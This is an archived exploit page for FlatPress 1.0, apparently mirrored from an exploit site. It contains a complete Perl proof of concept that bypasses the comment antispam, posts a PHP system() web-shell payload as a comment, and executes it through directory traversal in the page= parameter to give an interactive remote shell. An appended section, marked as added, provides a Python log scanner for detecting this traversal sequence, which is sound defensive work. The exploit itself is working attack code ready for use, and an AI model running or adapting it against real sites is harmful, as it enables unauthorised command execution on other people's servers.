Flatpress 1.0 Traversal / Command Execution
Source: justanotherhacker.com  Author: Wireghoul  Published: 2013-11-08
#!/usr/bin/perl
# Exploit Title: Flatpress remote code execution PoC NULLday
# Google Dork: This site is powered by FlatPress.
# Date: 17/10/2013
# Exploit Author: Wireghoul
# Vendor Homepage: http://flatpress.org/home/
# Software Link: http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2
# Version: v1.0
#
# Blended threat, executes code injected into comment
# by loading comment as a page through directory traversal
# Requires the inlinePHP plugin to be enabled.
# Written by @Wireghoul - justanotherhacker.com
#
# This is for my peeps and the freaks in the front row -- Hilltop Hoods: Nosebleed section

use strict;
use warnings;
use LWP::UserAgent;

&banner;
&usage if (!$ARGV[0]);
my $injid = 'Spl0ited'.int(rand(9999));
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->cookie_jar({ file => "tmp/flatpress-rce.txt" });

sub banner {
    print "\nFlatpress remote code execution PoC by \@Wireghoul\n";
    print "=======================[ justanotherhacker.com]==\n";
}

sub usage {
    print "Usage: $0 <url>\n";
    exit;
}

my $response = $ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");
if (!$response->is_success) {
    print "[-] Inline PHP plugin not found at $ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";
} else {
    print "[+] Inline PHP plugin found, hopefully it is enabled!\n";
}
# Prepare for exploitation, find entry + comment location
$response = $ua->get($ARGV[0]);
if ($response->is_success) {
    if ($response->decoded_content =~ /(http.*?x=entry:entry.*?;comments:1#comments)/) {
        my $cmntlink = $1;
        print "[+] Found comment link: $cmntlink\n";
        # Can't be bothered solving easy captchas, just reload page until we get one we like
        my $aaspam = 0;
        while ($aaspam == 0) {
            $response = $ua->get($cmntlink);
            if ($response->decoded_content =~ /<strong>(\d+) plus (\d+) \? \(\*\)/) {
                $aaspam = $1+$2;
                print "[+] Defeated antispam $1 + $2 = $aaspam\n";
            } else {
                $response->decoded_content =~ m/<strong>(.*) \? \(\*\)/;
                print "[*] Unknown antispam: $1 ... retrying\n";
            }
        }
        # Post a comment
        $response = $ua->post(
            $cmntlink."form",
            Content => {
                'name' => $injid,
                'email' => '',
                'url' => '',
                'aaspam' => $aaspam,
                'content' => "SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",
                'submit' => 'Add',
            }
        );
        $response = $ua->get($cmntlink);
        # Find link to injected content, then execute pseudo shell in loop
        my @cmnts = split (/<li id="comment/, $response->decoded_content);
        my @injected = grep /$injid/, @cmnts;
        if ($injected[0] =~ /$injid/) {
            print "[+] Injection ($injid) successful\n";
            $injected[0] =~ m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/;
            my $shell="$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5";
            print "[*] Dropping into shell, type exit to exit\n";
            my $line='';
            while (1) {
                print '$ ';   # prompt string; the archived copy garbled it, '$ ' is reconstructed
                $line=<STDIN>;
                if ($line =~ /^exit$/) { exit; };
                my $output=$ua->get("$shell&cmd=$line");
                $output->decoded_content =~ /SHELL(.*)LLEHS/ms;
                my $clean = $1;
                $clean =~ s/<br \/>//g;
                print "$clean\n";
            }
        } else {
            print '[-] Unable to identify the injection point';
        }
    } else {
        print "[-] Comment link not found\n";
    }
} else {
    die $response->status_line;
}
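A defender-side detection check for the technique described in the header comments (probe the inlinePHP plugin file, then load a comment file through a traversing `page=` parameter), added here as an example and not part of the original PoC. The Apache combined-format log lines, the /flatpress/ install path and the entry/comment ids are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format log lines (not real traffic); the
# /flatpress/ install path and the entry/comment ids are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Nov/2013:10:00:01 +0000] "GET /flatpress/fp-plugins/inlinephp/plugin.inlinephp.php HTTP/1.1" 200 12 "-" "libwww-perl/6.04"
203.0.113.5 - - [08/Nov/2013:10:00:02 +0000] "GET /flatpress/?x=entry:entry131017-120000;comments:1 HTTP/1.1" 200 5120 "-" "libwww-perl/6.04"
203.0.113.5 - - [08/Nov/2013:10:00:05 +0000] "GET /flatpress/?page=../../content/13/10/entry131017-120000/comments/comment131017-120500&cmd=id HTTP/1.1" 200 340 "-" "libwww-perl/6.04"
198.51.100.7 - - [08/Nov/2013:10:01:00 +0000] "GET /flatpress/?page=about HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(target):
    """Label one request target, or return None when nothing in it is suspicious."""
    parts = urlsplit(target)
    if parts.path.endswith("/fp-plugins/inlinephp/plugin.inlinephp.php"):
        # The PoC first fetches the plugin file to see whether inlinePHP is installed.
        return "recon: inlinePHP plugin probe"
    qs = parse_qs(parts.query, keep_blank_values=True)
    # parse_qs already decodes one layer of %xx; unquote again to catch double encoding.
    page = unquote(qs.get("page", [""])[0])
    if "../" in page and "/comments/comment" in page:
        label = "traversal: comment file loaded as page"
        return (label + " + cmd param") if "cmd" in qs else label
    if "../" in page:
        return "traversal: page param"
    return None

def scan(log_text):
    """Return (client_ip, label) for every suspicious request in the log text."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m.group("target"))
        if label:
            findings.append((m.group("ip"), label))
    return findings

if __name__ == "__main__":
    for ip, label in scan(SAMPLE_LOG):
        print(ip, label)
```

A plugin probe followed by a traversing `page=` request from the same client within a short window is the sequence to alert on; a lone `page=about` request is normal Flatpress static-page traffic.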
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved